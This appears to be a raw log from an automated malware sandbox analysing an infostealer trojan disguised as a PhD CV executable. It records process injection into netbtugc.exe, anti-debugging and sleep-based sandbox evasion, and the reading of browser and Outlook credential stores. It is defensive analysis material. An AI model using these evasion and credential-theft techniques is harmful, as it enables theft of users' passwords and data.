                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034B2C30 NtMapViewOfSection,LdrInitializeThunk,4_2_034B2C30
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034B2CF0 NtDelayExecution,LdrInitializeThunk,4_2_034B2CF0
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034B34E0 NtCreateMutant,LdrInitializeThunk,4_2_034B34E0
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034B38D0 NtGetContextThread,LdrInitializeThunk,4_2_034B38D0
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034B2B20 NtQueryInformationProcess,4_2_034B2B20
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034B2BE0 NtQueryVirtualMemory,4_2_034B2BE0
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034B2AA0 NtQueryInformationFile,4_2_034B2AA0
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034B29D0 NtWaitForSingleObject,4_2_034B29D0
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034B2F30 NtOpenDirectoryObject,4_2_034B2F30
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034B2FB0 NtSetValueKey,4_2_034B2FB0
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034B2EC0 NtQuerySection,4_2_034B2EC0
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034B2E80 NtCreateProcessEx,4_2_034B2E80
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034B2EB0 NtProtectVirtualMemory,4_2_034B2EB0
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034B2D50 NtWriteVirtualMemory,4_2_034B2D50
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034B2DC0 NtAdjustPrivilegesToken,4_2_034B2DC0
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034B2C10 NtOpenProcess,4_2_034B2C10
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034B2C20 NtSetInformationFile,4_2_034B2C20
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034B2CD0 NtEnumerateKey,4_2_034B2CD0
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034B3C30 NtOpenProcessToken,4_2_034B3C30
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034B3C90 NtOpenThread,4_2_034B3C90
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02C792A0 NtDeleteFile,4_2_02C792A0
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02C79340 NtClose,4_2_02C79340
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02C79040 NtCreateFile,4_2_02C79040
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02C791B0 NtReadFile,4_2_02C791B0
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02C794B0 NtAllocateVirtualMemory,4_2_02C794B0
                Source: C:\Windows\SysWOW64\netbtugc.exe Code function: String function: 034C7BE4 appears 101 times
                Source: C:\Windows\SysWOW64\netbtugc.exe Code function: String function: 034FEF10 appears 105 times
                Source: C:\Windows\SysWOW64\netbtugc.exe Code function: String function: 0346B910 appears 272 times
                Source: C:\Windows\SysWOW64\netbtugc.exe Code function: String function: 034B5050 appears 57 times
                Source: C:\Windows\SysWOW64\netbtugc.exe Code function: String function: 034EE692 appears 86 times
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe Code function: String function: 00F3B910 appears 272 times
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe Code function: String function: 00FCEF10 appears 105 times
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe Code function: String function: 00F85050 appears 58 times
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe Code function: String function: 00FBE692 appears 86 times
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe Code function: String function: 00F97BE4 appears 101 times
                Source: Maryam Farokhi-PhD- CV-1403.exe, 00000000.00000002.28276909146.0000000003457000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameuser.dll" vs Maryam Farokhi-PhD- CV-1403.exe
                Source: Maryam Farokhi-PhD- CV-1403.exe, 00000000.00000002.28281074134.0000000005E50000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameuser.dll" vs Maryam Farokhi-PhD- CV-1403.exe
                Source: Maryam Farokhi-PhD- CV-1403.exe, 00000000.00000002.28276028801.00000000014FE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs Maryam Farokhi-PhD- CV-1403.exe
                Source: Maryam Farokhi-PhD- CV-1403.exe, 00000000.00000002.28281807050.0000000007AF0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMontero.dll8 vs Maryam Farokhi-PhD- CV-1403.exe
                Source: Maryam Farokhi-PhD- CV-1403.exe, 00000000.00000002.28276909146.000000000342A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameuser.dll" vs Maryam Farokhi-PhD- CV-1403.exe
                Source: Maryam Farokhi-PhD- CV-1403.exe, 00000002.00000002.30064205277.0000000000AB8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamenetbtugc.exej% vs Maryam Farokhi-PhD- CV-1403.exe
                Source: Maryam Farokhi-PhD- CV-1403.exe, 00000002.00000002.30064561251.000000000103D000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Maryam Farokhi-PhD- CV-1403.exe
                Source: Maryam Farokhi-PhD- CV-1403.exe Binary or memory string: OriginalFilenameqesm.exe. vs Maryam Farokhi-PhD- CV-1403.exe
                Source: Maryam Farokhi-PhD- CV-1403.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Maryam Farokhi-PhD- CV-1403.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.Maryam Farokhi-PhD- CV-1403.exe.4681ec0.2.raw.unpack, FIoRjuCKxkBVHLGxU9.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Maryam Farokhi-PhD- CV-1403.exe.4681ec0.2.raw.unpack, u9GUJC5UERNX76PhJ1.cs Security API names: _0020.SetAccessControl
                Source: 0.2.Maryam Farokhi-PhD- CV-1403.exe.4681ec0.2.raw.unpack, u9GUJC5UERNX76PhJ1.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Maryam Farokhi-PhD- CV-1403.exe.4681ec0.2.raw.unpack, u9GUJC5UERNX76PhJ1.cs Security API names: _0020.AddAccessRule
                Source: 0.2.Maryam Farokhi-PhD- CV-1403.exe.7af0000.4.raw.unpack, u9GUJC5UERNX76PhJ1.cs Security API names: _0020.SetAccessControl
                Source: 0.2.Maryam Farokhi-PhD- CV-1403.exe.7af0000.4.raw.unpack, u9GUJC5UERNX76PhJ1.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Maryam Farokhi-PhD- CV-1403.exe.7af0000.4.raw.unpack, u9GUJC5UERNX76PhJ1.cs Security API names: _0020.AddAccessRule
                Source: 0.2.Maryam Farokhi-PhD- CV-1403.exe.7af0000.4.raw.unpack, FIoRjuCKxkBVHLGxU9.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/2@17/9
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Maryam Farokhi-PhD- CV-1403.exe.log
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe Mutant created: NULL
                Source: C:\Windows\SysWOW64\netbtugc.exe File created: C:\Users\user\AppData\Local\Temp\aU043Z43
                Source: Maryam Farokhi-PhD- CV-1403.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: netbtugc.exe, 00000004.00000002.33211544402.0000000008033000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.30255917594.000000000802B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE benefit_merchant_domains (benefit_id VARCHAR NOT NULL, merchant_domain VARCHAR NOT NULL)U;
                Source: netbtugc.exe, 00000004.00000003.30251497450.0000000002ED8000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.33207890621.0000000002ED8000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.33207890621.0000000002EB8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: netbtugc.exe, 00000004.00000002.33211544402.0000000008086000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.33211544402.0000000008094000.00000004.00000020.00020000.00000000.sdmp, aU043Z43.4.dr Binary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;
                Source: Maryam Farokhi-PhD- CV-1403.exe ReversingLabs: Detection: 36%
                Source: unknown Process created: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe "C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe"
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe Process created: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe "C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe"
                Source: C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
                Source: C:\Windows\SysWOW64\netbtugc.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe Section loaded: edgegdi.dll
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe Section loaded: windowscodecs.dll
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe Section loaded: dwrite.dll
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe Section loaded: textshaping.dll
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe Section loaded: iconcodecservice.dll
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe Section loaded: edgegdi.dll
                Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: iphlpapi.dll
                Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: edgegdi.dll
                Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: cryptbase.dll
                Source: C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe Section loaded: wininet.dll
                Source: C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe Section loaded: mswsock.dll
                Source: C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe Section loaded: dnsapi.dll
                Source: C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe Section loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe Section loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe Section loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Windows\SysWOW64\netbtugc.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: Maryam Farokhi-PhD- CV-1403.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: Maryam Farokhi-PhD- CV-1403.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Maryam Farokhi-PhD- CV-1403.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: qesm.pdb source: Maryam Farokhi-PhD- CV-1403.exe
                Source: Binary string: qesm.pdbSHA256 source: Maryam Farokhi-PhD- CV-1403.exe
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ptzMmYcrKro.exe, 00000003.00000000.29988243564.0000000000A8E000.00000002.00000001.01000000.0000000A.sdmp, ptzMmYcrKro.exe, 00000005.00000002.33208908459.0000000000A8E000.00000002.00000001.01000000.0000000A.sdmp
                Source: Binary string: wntdll.pdbUGP source: Maryam Farokhi-PhD- CV-1403.exe, 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.33209248579.0000000003440000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.33209248579.000000000356D000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.30076327355.0000000003298000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.30072902814.00000000030ED000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Maryam Farokhi-PhD- CV-1403.exe, Maryam Farokhi-PhD- CV-1403.exe, 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000004.00000002.33209248579.0000000003440000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.33209248579.000000000356D000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.30076327355.0000000003298000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.30072902814.00000000030ED000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: netbtugc.pdb source: Maryam Farokhi-PhD- CV-1403.exe, 00000002.00000002.30064205277.0000000000AB8000.00000004.00000020.00020000.00000000.sdmp, ptzMmYcrKro.exe, 00000003.00000003.32061041259.0000000000C1B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: netbtugc.pdbGCTL source: Maryam Farokhi-PhD- CV-1403.exe, 00000002.00000002.30064205277.0000000000AB8000.00000004.00000020.00020000.00000000.sdmp, ptzMmYcrKro.exe, 00000003.00000003.32061041259.0000000000C1B000.00000004.00000001.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe Code function: 0_2_019BDA6B push eax; retf 0_2_019BDA71
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe Code function: 2_2_004158FE pushad; iretd 2_2_00415913
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe Code function: 2_2_0041195D push esp; iretd 2_2_00411998
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe Code function: 2_2_00411963 push esp; iretd 2_2_00411998
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe Code function: 2_2_0041434D pushad; retf 2_2_00414352
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe Code function: 2_2_00403370 push eax; ret 2_2_00403372
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe Code function: 2_2_00414B71 push ss; iretd 2_2_00414B72
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe Code function: 2_2_004183AA push 00000057h; retf 2_2_004183BD
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe Code function: 2_2_004144B0 push ecx; iretd 2_2_004144C5
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe Code function: 2_2_00414DF1 push ebp; ret 2_2_00414DF9
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe Code function: 2_2_004186C3 push eax; ret 2_2_004186C6
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe Code function: 2_2_00418768 push ss; ret 2_2_00418748
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe Code function: 2_2_00416771 push ss; ret 2_2_00416799
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe Code function: 2_2_004157EA push eax; retf 2_2_004157EB
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe Code function: 2_2_0041778A push ds; ret 2_2_0041778B
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe Code function: 2_2_00F121AD pushad; retf 0004h 2_2_00F1223F
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe Code function: 2_2_00F408CD push ecx; mov dword ptr [esp], ecx 2_2_00F408D6
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe Code function: 2_2_00F197A1 push es; iretd 2_2_00F197A8
                Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_034421AD pushad; retf 0004h 4_2_0344223F
                Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_034708CD push ecx; mov dword ptr [esp], ecx 4_2_034708D6
                Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_034497A1 push es; iretd 4_2_034497A8
                Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_02C633FE push ss; ret 4_2_02C63426
                Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_02C65350 push eax; ret 4_2_02C65353
                Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_02C65037 push 00000057h; retf 4_2_02C6504A
                Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_02C6B6C4 push eax; ret 4_2_02C6B6CC
                Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_02C617FE push ss; iretd 4_2_02C617FF
                Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_02C62477 push eax; retf 4_2_02C62478
                Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_02C64417 push ds; ret 4_2_02C64418
                Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_02C6B5D0 push eax; retf 4_2_02C6B5EC
                Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_02C705DB push ebp; ret 4_2_02C705DC
                Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_02C5E5EA push esp; iretd 4_2_02C5E625
                Source: Maryam Farokhi-PhD- CV-1403.exe Static PE information: section name: .text entropy: 7.8582749593762085
                Source: 0.2.Maryam Farokhi-PhD- CV-1403.exe.4681ec0.2.raw.unpack: High entropy of concatenated method names
                Source: 0.2.Maryam Farokhi-PhD- CV-1403.exe.7af0000.4.raw.unpack: High entropy of concatenated method names
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\netbtugc.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: Yara match; File source: Process Memory Space: Maryam Farokhi-PhD- CV-1403.exe PID: 7832, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\netbtugc.exe; API/Special instruction interceptor: Address: 7FFBA878D144
                Source: C:\Windows\SysWOW64\netbtugc.exe; API/Special instruction interceptor: Address: 7FFBA878D604
                Source: C:\Windows\SysWOW64\netbtugc.exe; API/Special instruction interceptor: Address: 7FFBA878D764
                Source: C:\Windows\SysWOW64\netbtugc.exe; API/Special instruction interceptor: Address: 7FFBA878D324
                Source: C:\Windows\SysWOW64\netbtugc.exe; API/Special instruction interceptor: Address: 7FFBA878D364
                Source: C:\Windows\SysWOW64\netbtugc.exe; API/Special instruction interceptor: Address: 7FFBA878D004
                Source: C:\Windows\SysWOW64\netbtugc.exe; API/Special instruction interceptor: Address: 7FFBA878FF74
                Source: C:\Windows\SysWOW64\netbtugc.exe; API/Special instruction interceptor: Address: 7FFBA878D864
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe; Memory allocated: 1970000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe; Memory allocated: 33B0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe; Memory allocated: 3170000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe; Memory allocated: 93F0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe; Memory allocated: 7CA0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe; Memory allocated: A3F0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe; Memory allocated: B3F0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe; Code function: 2_2_00F8088E rdtsc
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe; Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\netbtugc.exe; Window / User API: threadDelayed 9104
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe; API coverage: 0.7 %
                Source: C:\Windows\SysWOW64\netbtugc.exe; API coverage: 2.9 %
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe TID: 4408; Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\netbtugc.exe TID: 6504; Thread sleep count: 122 > 30
                Source: C:\Windows\SysWOW64\netbtugc.exe TID: 6504; Thread sleep time: -244000s >= -30000s
                Source: C:\Windows\SysWOW64\netbtugc.exe TID: 6504; Thread sleep count: 9104 > 30
                Source: C:\Windows\SysWOW64\netbtugc.exe TID: 6504; Thread sleep time: -18208000s >= -30000s
                Source: C:\Windows\SysWOW64\netbtugc.exe; Last function: Thread delayed
                Source: C:\Windows\SysWOW64\netbtugc.exe; Code function: 4_2_02C6C5F0 FindFirstFileW,FindNextFileW,FindClose
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe; Thread delayed: delay time: 922337203685477
                Source: netbtugc.exe, 00000004.00000002.33207890621.0000000002E5E000.00000004.00000020.00020000.00000000.sdmp, ptzMmYcrKro.exe, 00000005.00000002.33208178086.000000000077F000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: firefox.exe, 00000006.00000002.30363720488.000001AFAD7A6000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^^
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe; Process information queried: ProcessInformation
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe; Process queried: DebugPort
                Source: C:\Windows\SysWOW64\netbtugc.exe; Process queried: DebugPort
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe; Code function: 2_2_00F8088E rdtsc
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe; Code function: 2_2_00417943 LdrLoadDll
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F6E507 mov eax, dword ptr fs:[00000030h]2_2_00F6E507
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F6E507 mov eax, dword ptr fs:[00000030h]2_2_00F6E507
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F6E507 mov eax, dword ptr fs:[00000030h]2_2_00F6E507
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F6E507 mov eax, dword ptr fs:[00000030h]2_2_00F6E507
